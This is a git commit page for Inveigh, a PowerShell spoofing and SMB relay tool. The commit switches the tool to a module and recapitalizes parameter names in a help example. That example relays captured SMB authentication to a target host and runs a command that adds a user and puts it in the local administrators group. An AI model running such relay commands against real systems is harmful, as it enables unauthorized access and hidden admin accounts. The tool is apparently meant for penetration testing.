diff options
author | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:56:05 -0400 |
---|---|---|
committer | Kevin Robertson <robertsonk@gmail.com> | 2015-10-06 20:56:05 -0400 |
commit | 9c0996fee2ee6364fa13c5865f712fdcd3f6d020 (patch) | |
tree | 89c37a5838e60aabde76db3b77d2ca9def984c85 /Inveigh.ps1 | |
parent | a8cc3e29be056545b42ed449610c1329d28a3fac (diff) | |
download | Inveigh-9c0996fee2ee6364fa13c5865f712fdcd3f6d020.tar.gz Inveigh-9c0996fee2ee6364fa13c5865f712fdcd3f6d020.zip |
Switched to module format
Inveigh should now be executed as a module rather than a standalone
script. There are multiple cmdlets for interacting with Inveigh. Also
fixed a file encoding issue that was causing problems with IEX.
Diffstat (limited to 'Inveigh.ps1')
-rw-r--r-- | Inveigh.ps1 | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/Inveigh.ps1 b/Inveigh.ps1 index 2bab315..9f05e74 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 @@ -106,7 +106,7 @@ Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be useful for sending traffic to a controlled Linux system on another subnet. .EXAMPLE -Invoke-Inveigh -smbrelay y -smbrelaytarget 192.168.2.55 -smbrelaycommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add" +Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. .EXAMPLE |